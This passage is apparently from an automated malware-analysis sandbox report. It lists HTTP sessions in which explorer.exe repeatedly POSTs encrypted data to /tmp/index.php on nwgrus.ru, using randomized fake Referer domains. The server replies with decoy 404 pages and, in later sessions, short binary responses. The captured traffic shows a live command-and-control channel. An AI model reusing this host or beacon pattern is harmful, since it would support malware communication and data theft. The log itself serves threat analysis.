[TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50012	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:22.773956060 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rdjriakbylriblg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: nwgrus.ru
Oct 14, 2024 06:03:22.773974895 CEST	154	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 39 41 f9 85 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu9A}LrF_.Hd2uKVBm5B1)-{d2
Oct 14, 2024 06:03:24.251450062 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50013	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:24.270028114 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sgyfmqyxpkmdbygm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 321 Host: nwgrus.ru
Oct 14, 2024 06:03:24.270092964 CEST	321	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 23 06 c5 84 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu#MP}S8S\"8es$x}R&M]#LjEW$t)u.g\|S,BYTRWQ!{hev+(;@i/TL
Oct 14, 2024 06:03:25.849334002 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50014	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:25.858557940 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eyrnjiqpamojnvp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 219 Host: nwgrus.ru
Oct 14, 2024 06:03:25.858557940 CEST	219	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 37 20 ca 91 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vu7 EUJT!KL<.q=x4tJY d>mMTY~,MF^IM;HF1aB
Oct 14, 2024 06:03:27.421068907 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50015	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:27.430206060 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rlfugmueckmpbf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 14, 2024 06:03:27.430206060 CEST	131	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 45 4a fd ea Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuEJkw~k#\?ebo=j:A
Oct 14, 2024 06:03:29.192805052 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50016	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:29.203883886 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hykquqealhec.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 182 Host: nwgrus.ru
Oct 14, 2024 06:03:29.204062939 CEST	182	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 75 27 d2 f2 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuu'kvFMDEs=`I[ah3Wq[\$JZkw5)<c1LDa
Oct 14, 2024 06:03:30.817409039 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50017	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:30.826036930 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wcfowkxogmtykxos.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: nwgrus.ru
Oct 14, 2024 06:03:30.826054096 CEST	298	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 37 1b d2 ea Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu7f\Y&'6A`4ee9\|m-.,$L1[VMP=?]NI3CCL mM,Z7IthDs.Ba.?0:
Oct 14, 2024 06:03:32.304296970 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50018	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:32.312530994 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mxgxdupfkhdkpgcd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: nwgrus.ru
Oct 14, 2024 06:03:32.312586069 CEST	223	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 6c 27 e4 fb Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vul'tGEYzh"vlP!efN%KST"SJODK317[)i8,GHA;49
Oct 14, 2024 06:03:34.246735096 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50019	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:34.564255953 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wrowxfwdtnqpxb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: nwgrus.ru
Oct 14, 2024 06:03:34.564279079 CEST	187	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 66 5b fc fa Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[+k,vuf[SG\eHkqi\qzllg(l^_4D%&EKR5X/ 2NWzD/*,3
Oct 14, 2024 06:03:36.144678116 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50023	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:04:43.891976118 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://shukyhyxsnyt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: nwgrus.ru
Oct 14, 2024 06:04:43.891976118 CEST	213	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 19 f0 b8 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuXz$MnQu(O\+`Q[,CIu:M8&2bSLQP[Um80m
Oct 14, 2024 06:04:45.418653011 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:04:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50024	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:04:49.589613914 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oytavkgbvwgngwdq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: nwgrus.ru
Oct 14, 2024 06:04:49.589648962 CEST	192	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 2f ce a1 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA .[k,vu2/a'OyZ<uqT+$qWB,WLJ(#X Y_cd_$xV3^};P<
Oct 14, 2024 06:04:51.149257898 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:04:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50025	125.7.253.10	80	4004	C:\Windows\explorer.exe

